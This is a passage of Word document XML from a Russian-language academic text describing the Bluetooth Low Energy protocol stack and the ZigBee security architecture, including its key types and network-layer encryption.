        <w:t xml:space="preserve"> , стек протокола BLE состоит из двух основных частей: контроллера и хоста. Контроллер содержит физический уровень и уровень связи и обычно реализуется как небольшая система на чипе (SOC) со встроенным радио. Хост работает на прикладном процессоре и включает в себя функции верхнего уровня, то есть протокол управления логикой и адаптацией (L2CAP), протокол атрибутов (ATT), профиль общих атрибутов (GATT), протокол управления безопасностью (SMP) и Общий профиль доступа (GAP). Связь между хостом и контроллером стандартизируется как интерфейс хост-контроллера (HCI). Наконец, поверх Хоста могут использоваться неосновные профили (т. е. Функциональные возможности прикладного уровня, не определенные спецификацией </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">). На рисунке </w:t>
      </w:r>
      <w:r w:rsidR="00A66CA1">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="005C04B7">
        <w:t>(а)</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> показан стек протокола BLE. На рисунке </w:t>
      </w:r>
      <w:r w:rsidR="00A66CA1">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="005C04B7">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="005C04B7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="005C04B7">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="005C04B7" w:rsidRPr="005C04B7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">изображена структура и размер различных полей, внесенных каждым слоем, в </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">блок данных физического уровня, когда данные приложения передаются. </w:t>
      </w:r>
      <w:r w:rsidR="00D91A39" w:rsidRPr="000C799E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1433C37F" wp14:editId="53901567">
            <wp:extent cx="4762500" cy="5076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5076825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F57840" w:rsidRPr="00A66CA1" w:rsidRDefault="00F57840" w:rsidP="005C04B7">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A66CA1">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00A66CA1">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="005C04B7" w:rsidRPr="00A66CA1">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">-Стек протокола </w:t>
      </w:r>
      <w:r w:rsidR="005C04B7" w:rsidRPr="005C04B7">
        <w:t>BLE</w:t>
      </w:r>
      <w:r w:rsidR="005C04B7" w:rsidRPr="00A66CA1">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> и структура и размер полей блока данных</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C04B7" w:rsidRPr="00A66CA1" w:rsidRDefault="005C04B7" w:rsidP="005C04B7">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C07525" w:rsidRPr="00F455FD" w:rsidRDefault="00C07525" w:rsidP="00C07525">
      <w:r w:rsidRPr="00C07525">
        <w:t xml:space="preserve">Несмотря на то, что некоторые функции контроллера BLE заимствованы у классического </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C07525">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C07525">
        <w:t xml:space="preserve">, они не совместимы между собой, т.е. устройство, поддерживающее только BLE (однорежимное устройство — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C07525">
        <w:t>single-mode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C07525">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C07525">
        <w:t>device</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C07525">
        <w:t xml:space="preserve">) не сможет взаимодействовать с устройством, поддерживающим только </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C07525">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C07525">
        <w:t xml:space="preserve"> 2.x/3.0. Для осуществления взаимодействия между ними хотя бы одно из устройств должно поддерживать оба стека протоколов (двухрежимное устройство — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C07525">
        <w:t>dual-mode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C07525">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C07525">
        <w:t>device</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C07525">
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="00F455FD" w:rsidRPr="00F455FD">
        <w:t>[17]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C07525" w:rsidRPr="00C07525" w:rsidRDefault="00C07525" w:rsidP="00C07525">
      <w:r w:rsidRPr="00C07525">
        <w:t xml:space="preserve">Однорежимные устройства обладают наименьшим потреблением и в основном представляют собой конечные исполнительные устройства. Двухрежимные устройства предполагают возможность периодического </w:t>
      </w:r>
      <w:r w:rsidRPr="00C07525">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">получения энергии, располагаются на различных мобильных устройствах, а также могут функционировать и как обычные </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C07525">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C07525">
        <w:t xml:space="preserve">-устройства. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00013518" w:rsidRPr="000C799E" w:rsidRDefault="005C04B7" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc503991002"/>
      <w:r>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r w:rsidR="00013518" w:rsidRPr="000C799E">
        <w:t>БЕЗОПАСНОСТЬ ПРОТОКОЛОВ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w:rsidR="00013518" w:rsidRPr="000C799E" w:rsidRDefault="005C04B7" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc503991003"/>
      <w:r>
        <w:t>2.1</w:t>
      </w:r>
      <w:r w:rsidR="00013518" w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Обеспечение безопасности в протоколе </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00013518" w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="000F60F0" w:rsidRPr="000C799E" w:rsidRDefault="000F60F0" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Отличительной чертой сетей </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> является гарантированная, устойчивая к помехам, многолучевому затуханию, различным сбоям и отказам передача данных. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F60F0" w:rsidRPr="000C799E" w:rsidRDefault="000F60F0" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">К этому следует добавить: не только гарантированная, но и безопасная передача, что важно для многих критических приложений. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F60F0" w:rsidRPr="000C799E" w:rsidRDefault="000F60F0" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Вместе с тем, в менее критических приложениях должна существовать возможность снижения цены устройств за счет некоторого снижения требований к уровню безопасности. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F60F0" w:rsidRPr="000C799E" w:rsidRDefault="000F60F0" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Именно такой подход реализуется в модели безопасности </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F60F0" w:rsidRPr="000C799E" w:rsidRDefault="000F60F0" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Основным механизмом обеспечения конфиденциальности в сетях </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> является надлежащая защита всех ключевых данных. А основой безопасности – доверительные отношения, которые обязательны как на стадии первоначальной установки ключей, так и в процессе обработки информации, касающейся безопасности. То есть, обмен данными должен производиться только между доверяемыми сторонами. Этот подход последовательно пронизывает всю иерархию обмена данными.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F60F0" w:rsidRPr="000C799E" w:rsidRDefault="000F60F0" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Спецификация </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> регламентирует безопасность на уровнях NWK</w:t>
      </w:r>
      <w:r w:rsidR="001573B7" w:rsidRPr="000C799E">
        <w:t>(сетевой уровень)и APS (уровне приложения)</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> и опирается на базовую структуру безопасности, регламентированную стандартом IEEE 802.15.4. Безопасность приложений обеспечивается посредством профилей приложений (стек протоколов</w:t>
      </w:r>
      <w:r w:rsidR="001573B7" w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> описан выше</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A74D30" w:rsidRPr="000C799E" w:rsidRDefault="000F60F0" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Ключи являются краеугольным камнем архитектуры безопасности </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">. Их защита имеет первостепенное значение, и ключи никогда не должны передаваться по не защищенным каналам. Кратковременное (и </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:lastRenderedPageBreak/>
        <w:t>единственное) исключение из этого правила имеет место только в момент присоединения к сети ранее не настроенного устройства.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00974EE0" w:rsidRPr="003802F9" w:rsidRDefault="00974EE0" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Спецификация </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> предусматривает особые меры безопасности, поскольку создаваемые в том или ином случае сети могут оказаться физически доступными для внешних устройств, а конкретные рабочие среды могут быть непредсказуемы. Более того, различные приложения, запускаемые одновременно и использующие для связи один и тот же трансивер, должны быть взаимно доверенными, поскольку из соображений стоимости модель не предусматривает брандмауэра между объектами приложений.</w:t>
      </w:r>
      <w:r w:rsidR="003802F9" w:rsidRPr="003802F9">
        <w:t>[20]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00974EE0" w:rsidRPr="000C799E" w:rsidRDefault="00974EE0" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">В стеке протокола различные слои не разделены </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>криптографически</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">, поэтому политика доступа обязательна и требует правильного проектирования. Открытая модель доверия внутри устройства позволяет разделение ключа, что особенно уменьшает потенциальную стоимость устройства. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00974EE0" w:rsidRPr="000C799E" w:rsidRDefault="00974EE0" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t>Тем не менее, слой, который создает фрейм, отвечает за его безопасность. Если существует риск появления вредоносных устройств, вся полезная нагрузка на создающем ее слое должна шифроваться, чтобы несанкционированный трафик мог быть немедленно отсечен. Исключением, как уже упоминалось, является передача новому присоединяемому устройству сетевого ключа, который передает ему уровень единой безопасности сети.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00974EE0" w:rsidRPr="000C799E" w:rsidRDefault="00974EE0" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t>Архитектура безопасности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00974EE0" w:rsidRPr="003802F9" w:rsidRDefault="00974EE0" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Система безопасности в соответствии со спецификацией </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> основана на 128-битном AES алгоритме. Предусмотренные спецификацией </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> службы безопасности определяют создание ключей, управление устройствами и защиту данных.</w:t>
      </w:r>
      <w:r w:rsidR="003802F9" w:rsidRPr="003802F9">
        <w:t>[18]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00974EE0" w:rsidRPr="000C799E" w:rsidRDefault="00974EE0" w:rsidP="00C07525"/>
    <w:p w:rsidR="00974EE0" w:rsidRPr="000C799E" w:rsidRDefault="00974EE0" w:rsidP="00C07525">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> использует 128-битные ключи для реализации механизмов безопасности. Ключ может быть ассоциирован либо с сетью (и использоваться уровнями </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> и MAC подуровнем) либо с каналом связи. Ключ может быть </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:lastRenderedPageBreak/>
        <w:t>получен путем предварительной установки, соглашения или передачи. Создание ключей канала связи основано на использовании главного ключа, который контролирует соответствие ключей канала связи. Первоначальный главный ключ должен быть получен через безопасную среду (передачей или предварительной установкой), так как безопасность всей сети зависит от него. Главный ключ и ключи каналов связи видны только на уровне приложений. Различные сервисы используют различные вариации ключа канала связи во избежание утечки и риска для безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F2E" w:rsidRPr="000C799E" w:rsidRDefault="00953F2E" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t>Распределение ключей является одной из наиболее важных функций безопасности сети. В защищенной сети назначается одно специальное устройство, которому другие устройства доверяют распределение ключей безопасности – центр управления безопасностью. В идеале каждое устройство в сети должно иметь предварительно загруженные адрес центра управления безопасностью и первоначальный главный ключ. Приложения без особых требований к безопасности могут использовать сетевой ключ, передаваемый центром управления безопасностью через не защищенный на момент передачи канал.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F2E" w:rsidRPr="000C799E" w:rsidRDefault="00953F2E" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Таким образом центр управления безопасностью поддерживает ключ сети и обеспечивает безопасность точка-точка. Устройства будут принимать только сообщения, зашифрованные с использованием ключа, предоставленного центром управления безопасностью, за исключением первоначального главного ключа. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F2E" w:rsidRPr="000C799E" w:rsidRDefault="00953F2E" w:rsidP="00C07525"/>
    <w:p w:rsidR="00953F2E" w:rsidRPr="000C799E" w:rsidRDefault="00953F2E" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t>Архитектура безопасности распределяется между сетевыми уровнями</w:t>
      </w:r>
      <w:r w:rsidR="003802F9" w:rsidRPr="003802F9">
        <w:t>[19]</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F2E" w:rsidRPr="000C799E" w:rsidRDefault="00953F2E" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t>Подуровень MAC способен устанавливать надежную связь с соседним устройством. Как правило, он использует уровень безопасности, определяемый верхними уровнями.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F2E" w:rsidRPr="000C799E" w:rsidRDefault="00953F2E" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Сетевой уровень управляет маршрутизацией, обрабатывает полученные сообщения и может направлять запросы. Исходящие </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:lastRenderedPageBreak/>
        <w:t>фреймы будут использовать ключ соответствующего канала связи согласно маршрутизации, если он доступен; в противном случае для защиты полезной нагрузки от внешних устройств будет использоваться сетевой ключ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F2E" w:rsidRPr="000C799E" w:rsidRDefault="00953F2E" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Уровень приложений устанавливает ключи и оказывает транспортные услуги как объекту устройства (ZDO), так и приложениям. Он отвечает также за распространение сообщений об изменениях в устройствах внутри сети, которые могут исходить как от самих устройств (например, простое изменение статуса), так и от центра управления безопасностью (который может сообщить, что определенное устройство удаляется из сети). Уровень также маршрутизирует запросы устройств центра управления безопасностью и обновления сетевого ключа от центра управления безопасностью всем устройствам. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidRDefault="00FA70D2" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Типы ключей </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidRDefault="00FA70D2" w:rsidP="00C07525">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> использует три типа ключей для управления безопасностью: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidRDefault="00FA70D2" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">главный ключ, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidRDefault="00FA70D2" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">сетевой ключ и </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidRDefault="00FA70D2" w:rsidP="005C04B7">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> ключ канала связи</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidRDefault="00FA70D2" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t>Главный ключ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidRDefault="00FA70D2" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t>Этот ключ не используется для шифрования. Он используется как разделяемый двумя устройствами секретный код при выполнении устройствами процедуры генерации ключа канала связи.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA70D2" w:rsidRDefault="00FA70D2" w:rsidP="005C04B7">
      <w:r w:rsidRPr="000C799E">
        <w:t>Главные ключи, создаваемые центром управления безопасностью, называются главными ключами центра безопасности, все другие ключи называются основными ключами уровня приложений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C04B7" w:rsidRDefault="005C04B7" w:rsidP="005C04B7"/>
    <w:p w:rsidR="005C04B7" w:rsidRPr="000C799E" w:rsidRDefault="005C04B7" w:rsidP="005C04B7"/>
    <w:p w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidRDefault="00FA70D2" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:lastRenderedPageBreak/>
        <w:t>Сетевые ключи</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidRDefault="00FA70D2" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Эти ключи обеспечивают безопасность сетевого уровня. Сетевой ключ имеет каждое устройство в сети </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidRDefault="00FA70D2" w:rsidP="005C04B7">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">По беспроводным каналам сетевые ключи высокой безопасности должны пересылаться только в зашифрованном виде. Стандартные сетевые ключи могут пересылаться как в зашифрованном, так и в не зашифрованном виде. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidRDefault="00FA70D2" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t>Ключи каналов связи</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA70D2" w:rsidRPr="003802F9" w:rsidRDefault="00FA70D2" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t>Эти ключи обеспечивают безопасную одноадресную передачу сообщений между двумя устройствами на уровне приложений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidRDefault="00FA70D2" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t>Безопасность на сетевом уровне</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA70D2" w:rsidRPr="003802F9" w:rsidRDefault="00FA70D2" w:rsidP="00C07525">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t>Сетевой ключ применяется для шифрования пользовательских данных (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">) и дополнительной информации верхнего уровня (APS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Layer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">). APS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Layer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> — это надстройка над полезными данными, связанная с понятием «профилей» в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> (включает информацию о профиле, кластере и конечных точках). Кроме защиты собственно полезной нагрузки (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">), безопасность на сетевом уровне обеспечивается шифрованием данных, связанных со служебными сетевым операциями, такими как прокладка маршрутов и команды уровней APS и ZDO. Сетевая безопасность не распространяется на MAC-уровень. Такая информация как PAN ID или адреса MAC-уровня не шифруются. Это означает, что любое устройство 802.15.4 может корректно принять пакет, передаваемый в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">-сети с включенной безопасностью, однако получить доступ к данным, расположенным за MAC-заголовком, ему не удастся — там оно обнаружит непонятный набор битов. Если в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>-сети включен режим безопасности, то все пакеты с данными передаются только в зашифрованном виде с помощью 128-бит алгоритма AES (</w:t>
      </w:r>
      <w:r w:rsidR="005C04B7">
        <w:t>Рисунок</w:t>
